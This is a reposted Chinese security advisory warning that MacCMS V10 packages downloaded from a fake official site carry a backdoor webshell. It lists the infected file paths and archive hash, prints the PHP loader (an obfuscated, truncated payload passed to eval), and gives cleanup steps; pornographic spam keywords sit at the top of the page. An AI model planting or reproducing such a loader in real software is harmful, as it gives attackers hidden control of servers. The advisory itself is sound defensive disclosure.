国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看

打開APP
userphoto
未登錄

開通VIP,暢享免費(fèi)電子書等14項(xiàng)超值服

開通VIP

首頁

好書

留言交流

下載APP

聯(lián)系客服
蘋果CMS/MacCMS V10后門WebShell,第三方下載注意

蘋果CMS/MacCMS

蘋果CMS是國內(nèi)優(yōu)秀的開源PHP建站系統(tǒng),擅長電影程序影視系統(tǒng)這一塊,在主流建站系統(tǒng)中特色鮮明,以靈活、小巧、兼容性好、負(fù)載強(qiáng)等優(yōu)點(diǎn)而深受許多站長的喜愛。

MacCMS后門Webshell

某天始,MacCMS官網(wǎng)因?yàn)槟承┰蛲[。同時在百度搜索蘋果CMS或MacCMS出現(xiàn)的排名第一均為一個:www.maccmsv10.com的網(wǎng)址,而真正的官網(wǎng)地址是www.maccms.com。前者使用了一個和maccms官網(wǎng)一模一樣的靜態(tài)首頁提供程序下載。最近幾天陸續(xù)有人發(fā)現(xiàn)了從這個網(wǎng)站下載的蘋果CMS程序存在后門webshell

體驗(yàn)盒子直接從該第三方站點(diǎn)下載了源碼,至今10月14日依然存在后門,所以基本可確信是故意搭建的假冒官網(wǎng)。

后門文件路徑

  1. ?maccms10\extend\upyun\src\Upyun\Api\Format.php
  2. ?maccms10\extend\Qcloud\Sms\Sms.php

MD5 (maccms10.zip) = 099e02dfa9d283e2891bce5bf9691643

最后修改日期都是:2019/6/12

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
error_reporting(E_ERROR);
@ini_set('display_errors','Off');
@ini_set('max_execution_time',20000);
@ini_set('memory_limit','256M');
header("content-Type: text/html; charset=utf-8");
$password = "0d41c75e2ab34a3740834cdd7e066d90";
function s(){
$str = "66756r6374696s6r207374…………"; //大馬
$str = str_rot13($str);
m($str);
}
function m($str){
global $password;
$jj = '';
eval($jj.pack('H*',$str).$jj);
}
s();
?>

MacCMS后門Webshell

很坦誠的孩子,一目了然?。?!

? maccms10\extend\Qcloud\Sms\Sms.php

登錄后主界面

? maccms10\extend\Qcloud\Sms\Sms.php

有些資歷的老黑可能一眼就看出來了,這是一個習(xí)科大馬改進(jìn)版。

修復(fù)

  1. 排查你的程序是否存在上面的后門路徑文件
  2. 如果存在,刪除后門文件,并進(jìn)行全盤查殺掃描
  3. 手動查看可疑文件是存存在隱藏后門
  4. 檢查服務(wù)器安全
本站僅提供存儲服務(wù),所有內(nèi)容均由用戶發(fā)布,如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請點(diǎn)擊舉報。
打開APP,閱讀全文并永久保存 查看更多類似文章
猜你喜歡
類似文章
PHP安全之webshell和后門檢測
后門查殺:linux python版webshell智能查殺程序
網(wǎng)站木馬后門排查過程一例
FAST-CGI解析漏洞拿下網(wǎng)站并提權(quán)windows系統(tǒng)服務(wù)器
什么是 webshell ?丨基礎(chǔ)
網(wǎng)站被黑中毒W(wǎng)ebShell木馬的解決方案
更多類似文章 >>
生活服務(wù)
分享 收藏 導(dǎo)長圖 關(guān)注 下載文章
綁定賬號成功
后續(xù)可登錄賬號暢享VIP特權(quán)!
如果VIP功能使用有故障,
可點(diǎn)擊這里聯(lián)系客服!

聯(lián)系客服